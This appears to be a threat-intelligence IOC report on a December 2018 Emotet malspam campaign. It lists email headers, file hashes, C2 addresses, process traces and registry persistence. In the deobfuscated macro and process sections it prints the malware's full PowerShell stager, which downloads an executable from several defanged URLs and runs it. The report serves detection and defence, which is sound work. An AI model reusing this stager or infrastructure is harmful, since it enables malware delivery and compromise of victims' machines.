- #IOC #OptiData #VR #emotet #feodo #W97M #powershell
- https://pastebin.com/EejcbL4t
- previous contact:
- 04/12/18 https://pastebin.com/znQDtbnt
- 09/11/18 https://pastebin.com/THHMs2wg
- 01/10/18 https://pastebin.com/Y6DnbpHv
- FAQ:
- https://radetskiy.wordpress.com/2018/10/19/ioc_emotet_011018/
- https://kc.mcafee.com/corporate/index?page=content&id=KB90108
- attack_vector
- --------------
- email attach .doc > macro > cmd > powershell > GET 5 URL > %temp%\***.exe
- email_headers
- --------------
- Received: from server.arroyo.bz (server.arroyo.bz [65.60.8.150])
- by srv8.victim1.com for <user0@org7.kv.victim1.com>;
- Thu, 20 Dec 2018 20:00:26 +0200 (EET)
- (envelope-from veronicat@mccell.com.mx)
- Received: from [138.122.96.73] (port=56726 helo=10.15.31.100)
- by server.arroyo.bz (Exim 4.91)
- for user0@org7.kv.victim1.com; Thu, 20 Dec 2018 12:00:07 -0600
- Date: Thu, 20 Dec 2018 12:00:40 -0600
- From: Вячеслав Прендзевский <prom@pride-ukraine.com.ua> <veronicat@mccell.com.mx>
- To: user0@org7.kv.victim1.com
- Subject: Вячеслав Прендзевский - Invoice 85841
- files
- --------------
- SHA-256 bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80
- File name Inv85841.doc
- File size 144.5 KB
- SHA-256 270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1
- File name pEakCmvuBiB.exe
- File size 536 KB
- activity
- **************
- deobfuscated_macro
- --------------
- powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
- pl_src: 1/5
- --------------
- h11p:\ opewinsng {.}com/bOiANyEc 404
- h11p:\ chamanga {.} org {.}uy/eE9DiHE6 200
- h11p:\ ideagold {.}by/rzb6hSlC3 403
- h11p:\ onetechblog{.} tek1{.} top/MyZztFl 403
- h11p:\ maxclean{.} srv {.}br/QVtDDcAZ 404
- C2:
- --------------
- http://189.226.214.129:8080/
- netwrk
- --------------
- 1.22.119.250 1.22.119.250 GET / HTTP/1.1 Mozilla/4.0
- comp
- --------------
- stgintel.exe 2224 189.226.214.129 8080 SYN_SENT
- stgintel.exe 2224 200.124.225.32 80 SYN_SENT
- stgintel.exe 2224 70.80.135.35 8443 SYN_SENT
- stgintel.exe 2224 201.102.7.208 8443 SYN_SENT
- stgintel.exe 2224 189.222.245.247 80 SYN_SENT
- stgintel.exe 2224 1.22.119.250 80 ESTABLISHED
- proc
- --------------
- "C:\Program Files (x86)\Microsoft Office\Office12\WINWORD.EXE" /n /dde
- c:\c556902829965\u3692599496166\i47356399652\..\..\..\windows\system32\cmd.exe /c %PrOgraMdatA:...
- CmD /V: /R " seT gali=;'033W'=814k$}}{hctac}};kaerb;'713Y'=636a$;833B$ metI-ekovnI{ )00008...
- C:\Windows\system32\cmd.exe /S /D /c" EchO pow%PUBLIC:~5,1%r%SESSIONNAME:...
- Cmd.EXe
- powershell $o497='G112';$E633=new-object Net.WebClient;$Q470='http://opewinsng {.}com/bOiANyEc@http://chamanga {.} org {.}uy/eE9DiHE6@http://ideagold {.}by/rzb6hSlC3@http://onetechblog{.} tek1{.} top/MyZztFl@http://maxclean{.} srv {.}br/QVtDDcAZ'.Split('@');$c691='w246';$V107 = '583';$U974='p613';$B338=$env:temp+'\'+$V107+'.exe';foreach($o680 in $Q470){try{$E633.DownloadFile($o680, $B338);$j643='Z181';If ((Get-Item $B338).length -ge 80000) {Invoke-Item $B338;$a636='Y317';break;}}catch{}}$k418='W330';
- C:\tmp\583.exe
- C:\Users\operator\AppData\Local\stgintel\stgintel.exe
- persist
- --------------
- HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run 23.12.2018 13:19
- stgintel
- TortoisePlink http://tortoisesvn.net
- c:\users\operator\appdata\local\stgintel\stgintel.exe 22.12.2018 16:05
- drop
- --------------
- C:\tmp\583.exe
- C:\Users\operator\AppData\Local\stgintel\stgintel.exe
- VR
- # # #
- https://www.virustotal.com/#/file/bf0d01d08d9ef9677f697e2e574429a72003319335616274510556c80c9a0a80/details
- https://www.virustotal.com/#/file/270d94b84b2acafeb682d975ecd076e96fe7892a095cd420b13eb1f54cc63fc1/details
- https://analyze.intezer.com/#/analyses/9142da6d-ba72-4ff1-a515-5b187735a162